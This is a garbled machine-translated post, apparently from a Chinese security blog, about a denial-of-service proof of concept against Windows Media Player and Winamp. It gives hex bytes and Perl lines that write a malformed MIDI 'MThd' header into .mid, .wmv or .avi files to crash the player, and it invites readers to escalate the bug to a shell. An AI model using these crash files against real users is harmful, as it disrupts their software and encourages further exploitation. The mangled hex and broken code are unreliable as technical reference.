0 6 the end of the year, I and Secunia maillist friends discuss when abroad of a friend to modify a Windows Media on the denial of service attack PoC, but at the time this is not a concern, I and this friend just a simple exchange, release out on the end, and then didn't take it to heart.
The time given to ads is such that now the search words, it should be in the milw0rm on the query to:
H0lly Shit for Windows Media
File Denial Of Service Vulnerability
Tested: Windows Media 10.00.00.4036 Windows XP SP2
file "example. mid" or "example. wmv" (Hex-Code):
4D 5 4 6 8 6 4 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 0 0 0 0
File size = 1 4 byte
That day I also simultaneously released in a black Union in the information security area, this thing will hold.
After a lapse of 4 months, and now appears a lot similar to exp. For example:
Winamp <= 5.33 (. AVI File) Remote Denial of Service Exploit
MS Windows Explorer (AVI) Unspecified Denial of Service Exploit
Winamp <= (WMV) 5.3 Buffer Overflow Exploit (0-DAY)
These in the google search can have, Of course, in the Black Union of the information security area I are of the reprint, if interested can go to consult.
In fact, very simple principle, similar to the 0 treatment.
the midi file of the head is this: the 4d 5 4 6 8 6 4 0 0 0 0 0 0 0 6 x1 x2 x3 x4 x5 x6, wherein x1 to x6 is a control word, x1 x2 specifies whether the multi-track are synchronized, x3 x4 specify the track number, x5 x6 specify the basic time data, 4d 5 4 6 8 6 4 ASCII characters“MThd”, identify the file types used 0 0 0 0 0 0 0 6 is fixed, I would like to declare the control word number of bytes, that is, x1~x6.
Knowing these, it is very clear.
For example:Winamp <= (WMV) 5.3 Buffer Overflow Exploit (0-DAY)given the critical code is this:
open(wmv, ">./ exploit. wmv");
print wmv "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".
print wmv "\x4D\x54\x68\x64";
Carefully control the look above I given on the header file definition, probably know what's going on?
Is actually the\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00 write the wmv file, the result is this:
4D 5 4 6 8 6 4 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 0 0 0 0 3 1
When the player reads when of course it appears to read 0 errors.
Other, such as:Winamp <= 5.33 (. AVI File) Remote Denial of Service Exploit, inside the code is really redundant（http://www.cnhacker.com/bbs/read.php?tid=164070&fpage=1, and
There are actually the following sentence on the line:
open(avi, ">./ Dr. Trojan. avi");
print avi "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".
print avi "\x4D\x54\x68\x64";
In fact, no matter what, the vulnerability of this stuff, someone research will have on the software of the progress, and now so many exp redirected to this exploit, compared to will get some people's attention. Wait for the player to develop the company's reaction.
As for whether use to exploit out the shell, that currently I haven't found a good method, if someone attempts to succeed, don't forget to mail me ha, appreciate it.